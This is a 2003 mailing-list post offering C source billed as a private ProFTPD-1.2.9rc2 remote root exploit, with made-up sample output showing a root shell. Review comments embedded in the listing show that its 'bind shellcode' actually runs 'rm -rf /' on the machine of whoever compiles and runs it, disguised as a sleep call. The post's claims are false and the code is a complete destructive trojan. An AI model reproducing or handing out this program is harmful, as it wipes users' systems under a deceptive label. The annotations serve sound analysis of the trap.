ProFTPD-1.2.9rc2 remote root exploit
From: "Jean-Kevin Grosnakeur" <fufeur () hotmail com>
Date: Fri, 24 Oct 2003 12:22:25 +0000
Ladies and gentlemen, here's the source code of the exploit for the latest release of ProFTPD. This is a Zero-Day private exploit, please DON'T REDISTRIBUTE. I will not take responsibility for any damages which could result from the usage of this exploit, use it at your own risk.
--------------------------------------------------------------------------
/* Example of use:
 *
 * # gcc exploit.c -o exploit
 * # ./exploit 192.168.1.1 21
 * Connected on 192.168.1.1:21
 * Exploitation in progress...
 * Exploitation string sent.
 * Trying to connect, please wait...
 * Linux michelle 2.4.20 #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown unknown GNU/Linux
 * uid=0(root) gid=0(root) groupes=0(root)
 */

/*
 * NOTE(review): This listing is not a ProFTPD exploit; it is a program that
 * harms the machine it is compiled and run on. Two things in it matter:
 *
 *  1. main() never reaches give_me_a_shell(). The statement
 *         void(*sleep)()=(void*)sc;sleep(5);
 *     declares a local function pointer named `sleep` that points into the
 *     sc[] array and calls it, so the bytes in sc[] execute on the LOCAL
 *     host with the privileges of whoever launched the binary. The
 *     surrounding comment ("connect to the bindshell") describes something
 *     else entirely.
 *
 *  2. sc[] is not a bind shell. Decoded byte by byte (x86, push-string
 *     style), it pushes "/bin/sh", "-c" and "rm -rf /" onto the stack,
 *     NUL-terminates them, builds an argv of {"/bin/sh", "-c", "rm -rf /",
 *     NULL} and issues execve (eax = 0x0b, int 0x80), then exit(1).
 *
 * The remaining "exploit" logic is decoration: the command sent to the
 * server spells "LOVE", RET is four printable ASCII bytes, and the send()
 * call transmits sizeof(char *) bytes. The example output in the comment
 * above cannot be produced by this code. Decoding an opaque payload
 * statically, as done here, is the reliable way to learn what a posted
 * "exploit" actually does before trusting the comments around it.
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <netdb.h>
/* NOTE(review): <string.h>, <netinet/in.h> and <arpa/inet.h> are not
 * included although strlen/memset/sprintf, htons, inet_ntoa and
 * struct sockaddr_in are used below; whether this compiles at all depends
 * on what <netdb.h> happens to pull in on the build host. */

#define NOP 0x90
/* 0x66 0x75 0x63 0x6b are all printable ASCII -- not a plausible stack or
 * code address for any target. */
#define RET 0x6675636b

/* x86 bind shellcode */
/* NOTE(review): the comment above is false. These bytes do not open a
 * listening socket; see the header note for the decoded execve of
 * "/bin/sh -c 'rm -rf /'". They are executed locally by main(). */
char sc[]=
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";

unsigned long resolve(char *hostname);
int give_me_a_shell(unsigned long dest);

/*
 * Entry point: resolves argv[1], builds a 1024-byte buffer, connects to
 * argv[2] (default 21), sends a few bytes, then executes sc[] locally.
 * Returns 0 on the usage path and after give_me_a_shell() succeeds, -1 on
 * any socket error -- but see the note at the `sleep` statement: control
 * does not normally get past it.
 */
int main(int argc, char *argv[])
{
    int i, *ret;            /* `ret` is never used */
    char *string;
    unsigned long addr;
    char buffer[1024];
    int port=21, fd, s;
    struct sockaddr_in addy;

    if(argc < 2) {
        fprintf(stdout, "usage: %s <host> <port>\n", argv[0]);
        return(0);
    } else
        addr=resolve(argv[1]);

    /* argv[argc] is NULL, so this is a valid (if unusual) optional-arg check. */
    if(argv[2])
        port=atoi(argv[2]);

    /* copy the NOPs to the buffer */
    /* All 1024 bytes are set to 0x90 and nothing writes a NUL afterwards,
     * so the strlen(buffer) below reads past the end of the array (UB). */
    memset(buffer, NOP, 1024);

    /* copy the shellcode to the buffer */
    for(i=0; i < strlen(sc); i++)
        buffer[i+700]=sc[i];

    /* copy the return address to the buffer */
    /* Writes 4-byte ints at offsets 815..1003 (last write ends at 1006,
     * inside the array); the unaligned int stores are themselves UB on
     * strict targets. */
    for(i=815; i<1003; i+=4)
        *((int *)&buffer[i]) = RET;

    /* strlen() of an unterminated buffer -- see the memset note. The 4-byte
     * prefix 0x4c 0x4f 0x56 0x45 is "LOVE", which is not an FTP command. */
    string = (char *) malloc(strlen(buffer)+20);
    sprintf(string, "\x4c\x4f\x56\x45 %s", buffer);

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if(fd < 0) {
        fprintf(stderr, "unable to socket()\n");
        return(-1);
    }

    addy.sin_family = AF_INET;
    addy.sin_addr.s_addr = addr;
    addy.sin_port = htons(port);

    /* connect to remote host */
    if(connect(fd, (struct sockaddr *)&addy, sizeof(addy)) < 0) {
        fprintf(stderr, "unable to connect()\n");
        return(-1);
    }

    printf("Connected on %s:%d\n", inet_ntoa(addy.sin_addr), port);
    printf("Exploitation in progress...\n");

    /* send the exploitation string to the host */
    /* sizeof(string) is the size of a char pointer, so at most 4 or 8 bytes
     * of `string` are ever transmitted. `<` binds tighter than `=`, so `s`
     * receives the 0/1 result of the comparison, not the send() count. */
    if(s = send(fd, string, sizeof(string), 0) < 0) {
        fprintf(stderr, "unable to send()\n");
        return(-1);
    }

    close(fd);
    printf("Exploitation string sent.\n");
    free(string);

    /* connect to the bindshell */
    printf("Trying to connect, please wait...\n");
    /* NOTE(review): this is not a call to sleep(3). A block-scope function
     * pointer named `sleep` is bound to the sc[] array and invoked, so the
     * bytes in sc[] run as code in THIS process. Per the header note they
     * execve "/bin/sh -c 'rm -rf /'" and, if that fails, exit(1); either
     * way the lines below are never reached. */
    void(*sleep)()=(void*)sc;sleep(5);

    if(give_me_a_shell(addr) < 0) {
        fprintf(stderr, "Sorry, exploit didn't work.\n");
        return(-1);
    }

    return(0);
}

/*
 * Resolve a hostname to an IPv4 address in network byte order.
 * Exits the process (exit(1)) when gethostbyname() fails.
 * Returns the first h_addr read through an unsigned long pointer; on LP64
 * hosts that reads 8 bytes from a 4-byte address, and the cast also
 * violates strict aliasing -- presumably only the low 32 bits end up in
 * s_addr on little-endian hosts.
 */
unsigned long resolve(char *sname)
{
    struct hostent * hip;
    hip = gethostbyname(sname);
    if (!hip) {
        fprintf(stderr, "unable to find %s\n",sname);
        exit(1);
    }
    return *(unsigned long *)hip -> h_addr;
}

/*
 * Interactive relay to a shell expected on TCP port 1337 of `addr`: sends
 * "uname -a && id", then forwards socket output to stderr and stdin lines
 * to the socket until the user types "quit". Returns 0 on "quit", -1 on
 * any socket error (the socket is closed on those paths).
 * NOTE(review): main() never reaches this function, see the `sleep` note.
 */
int give_me_a_shell(unsigned long addr)
{
    int sock;
    fd_set fds;
    struct sockaddr_in shell;
    unsigned char buf[4096];
    char cmd[]="uname -a && id";

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock < 0) {
        fprintf(stderr, "unable to socket()\n");
        return(-1);
    }

    shell.sin_family = AF_INET;
    shell.sin_port = htons(1337);
    shell.sin_addr.s_addr = addr;

    if(connect(sock, (struct sockaddr *)&shell, sizeof(struct sockaddr)) < 0) {
        fprintf(stderr, "unable to connect()\n");
        close(sock);
        return(-1);
    }

    /* Return value of send() is not checked. */
    send(sock, cmd, strlen(cmd), 0);

    while(1) {
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(sock, &fds);

        /* nfds is a fixed 255 rather than sock+1; only correct while sock < 255. */
        if(select(255, &fds, NULL, NULL, NULL) == -1) {
            fprintf(stderr, "unable to select()\n");
            close(sock);
            return(-1);
        }

        /* Zeroing first is what supplies the NUL for the "%s"/strcmp/strlen
         * below -- unless a recv() or read() fills all 4096 bytes, in which
         * case there is no terminator and those calls over-read. */
        memset(buf, 0, sizeof(buf));

        if(FD_ISSET(sock, &fds)) {
            /* A return of 0 (peer closed) is not handled; the loop spins. */
            if(recv(sock, buf, sizeof(buf), 0) < 0) {
                fprintf(stderr, "unable to recv()\n");
                close(sock);
                return(-1);
            }
            fprintf(stderr, "%s", buf);
        }

        if(FD_ISSET(0, &fds)) {
            /* read() result ignored. A line typed at a terminal arrives
             * with its trailing newline, so strcmp() against "quit" would
             * only match if the input had no newline -- TODO confirm. */
            read(0, buf, sizeof(buf));
            if(!strcmp(buf, "quit")) {
                close(sock);
                return(0);
            }
            write(sock, buf, strlen(buf));
        }
    }
}
--------------------------------------------------------------------------
Have fun ! @+
_________________________________________________________________MSN Messenger 6 http://g.msn.fr/FR1001/866 : plus de personnalisation, plus de fun pour vous et vos amisÂ…